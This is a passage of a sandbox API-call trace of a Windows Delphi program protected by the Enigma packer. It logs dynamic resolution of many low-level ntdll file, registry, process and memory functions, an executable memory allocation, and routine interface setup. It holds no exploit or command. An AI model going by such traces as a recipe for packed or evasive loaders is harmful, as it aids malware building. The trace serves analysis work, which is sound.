DRIVE%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b62c*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0x54b62c*="%Local, ApplicationData FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b628*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0x54b628*="%AllUsers, ApplicationData FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b624*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0x54b624*="%Temp FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b620*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0x54b620*="%ApplicationData FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b61c*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0x54b61c*="%InternetCache FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b618*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0x54b618*="%Cookies FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b614*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0x54b614*="%History FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b610*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0x54b610*="%My Pictures FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b60c*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0x54b60c*="%AllUsers, Documents FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b608*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0x54b608*="%Program Files, Common FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b604*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0x54b604*="%Program Files FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b600*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0x54b600*="%My Documents FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b5fc*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0x54b5fc*="%WINDOWS FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b5f8*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0x54b5f8*="%SYSTEM FOLDER%") returned 1 [0061.111] SysReAllocStringLen (in: pbstr=0x54b5f4*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0x54b5f4*="%DEFAULT FOLDER%") returned 1 [0061.229] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0061.229] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x2a0000 [0062.024] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0062.024] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0062.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0062.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0062.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0062.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0062.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0062.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0062.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0062.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0062.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0062.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0062.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0062.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0062.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0062.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0062.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0062.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0062.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0062.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0062.033] VirtualFree (lpAddress=0x2a0000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0062.034] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.034] GetProcAddress (hModule=0x77a60000, lpProcName="ZwProtectVirtualMemory") returned 0x77a80028 [0062.034] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.034] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0062.034] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.034] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0062.035] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.035] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0062.035] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.035] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0062.035] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.035] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0062.035] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0062.035] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0062.094] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3054349688099) returned 1 [0062.669] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0x2b0000 [0062.672] SysReAllocStringLen (in: pbstr=0x54bf5c*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0x54bf5c*="enigma_ide.dll") returned 1 [0062.842] GetDC (hWnd=0x0) returned 0x701020b [0062.842] GetDeviceCaps (hdc=0x701020b, index=90) returned 96 [0062.843] ReleaseDC (hWnd=0x0, hDC=0x701020b) returned 1 [0062.901] GetDC (hWnd=0x0) returned 0x701020b [0062.901] GetDeviceCaps (hdc=0x701020b, index=104) returned 0 [0062.901] ReleaseDC (hWnd=0x0, hDC=0x701020b) returned 1 [0062.902] CreatePalette (plpal=0x28fac0) returned 0xd080222 [0062.902] GetStockObject (i=7) returned 0x1b00017 [0062.902] GetStockObject (i=5) returned 0x1900015 [0062.902] GetStockObject (i=13) returned 0x18a002e [0062.902] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0062.902] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0063.169] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x75980000 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff26, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff25, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff24, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff23, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff22, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff21, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff20, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff3f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff3e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff3d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff3c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff3b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff3a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff39, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff38, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff37, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0063.256] LoadStringA (in: hInstance=0x42d000, uID=0xff36, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0063.257] LoadStringA (in: hInstance=0x42d000, uID=0xff35, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0063.543] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc112 [0063.543] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1be [0063.543] GetCurrentThreadId () returned 0xf38 [0063.604] GlobalAddAtomA (lpString="EnigmaWndProcPtr0040000000000F38") returned 0xc167 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfee1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfee0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfeff, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfefe, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfefd, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfefc, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfefb, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfefa, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef9, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef8, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef7, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef6, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef5, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef4, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef3, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef2, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xfef0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xff0f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xff0e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0063.663] LoadStringA (in: hInstance=0x42d000, uID=0xff0d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff0c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff0b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff0a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff09, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff08, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff07, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff06, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff05, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff04, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff03, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff02, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff01, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff00, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0063.664] LoadStringA (in: hInstance=0x42d000, uID=0xff1f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff1e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff1d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff1c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff1b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff1a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff19, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff18, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff17, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff16, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff15, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff14, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0063.665] LoadStringA (in: hInstance=0x42d000, uID=0xff13, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0063.722] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1bc [0063.722] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc076 [0063.836] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75410000 [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="InitializeFlatSB") returned 0x7544266f [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="UninitializeFlatSB") returned 0x75442542 [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollProp") returned 0x75441d29 [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollProp") returned 0x7544238d [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_EnableScrollBar") returned 0x754420c9 [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_ShowScrollBar") returned 0x75441fdb [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollRange") returned 0x75441e8d [0063.837] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollInfo") returned 0x75441f0f [0063.838] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollPos") returned 0x75441ccd [0063.838] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollPos") returned 0x7544216d [0063.838] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollInfo") returned 0x754422be [0063.838] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollRange") returned 0x754421e2 [0063.898] GetModuleHandleA (lpModuleName="User32.dll") returned 0x75980000 [0063.898] GetProcAddress (hModule=0x75980000, lpProcName="SetLayeredWindowAttributes") returned 0x759bec88 [0063.898] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc075 [0064.074] GetVersion () returned 0x1db10106 [0064.074] GetCurrentProcessId () returned 0xf34 [0066.612] GlobalAddAtomA (lpString="EnigmaDelphi00000F34") returned 0xc166 [0066.613] GetCurrentThreadId () returned 0xf38 [0066.613] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000F38") returned 0xc165 [0066.613] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000F38") returned 0xc1bd [0066.614] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0066.614] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0066.614] GetSystemMetrics (nIndex=19) returned 1 [0067.230] GetSystemMetrics (nIndex=75) returned 1 [0067.230] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x32e188c, fWinIni=0x0 | out: pvParam=0x32e188c) returned 1 [0067.410] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0067.410] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0067.410] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x0 [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0067.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x0 [0067.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x0 [0067.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x0 [0067.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x0 [0067.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x0 [0067.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x0 [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0067.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0067.412] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0067.412] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0067.412] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0067.412] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0067.412] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0067.412] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0067.412] GetDC (hWnd=0x0) returned 0x701020b [0067.412] GetDeviceCaps (hdc=0x701020b, index=90) returned 96 [0067.412] ReleaseDC (hWnd=0x0, hDC=0x701020b) returned 1 [0067.412] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0067.412] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4bd66c, dwData=0x32e1ad8) returned 1 [0067.465] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x28fe27, fWinIni=0x0 | out: pvParam=0x28fe27) returned 1 [0067.465] CreateFontIndirectA (lplf=0x28fe27) returned 0x300a0b51 [0067.513] GetObjectA (in: h=0x300a0b51, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0067.513] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x28fcd3, fWinIni=0x0 | out: pvParam=0x28fcd3) returned 1 [0067.513] CreateFontIndirectA (lplf=0x28fdaf) returned 0x30a0b50 [0067.513] GetObjectA (in: h=0x30a0b50, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0067.514] CreateFontIndirectA (lplf=0x28fd73) returned 0x2c0a016c [0067.514] GetObjectA (in: h=0x2c0a016c, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0067.664] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0067.738] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28fd87, nSize=0x100 | out: 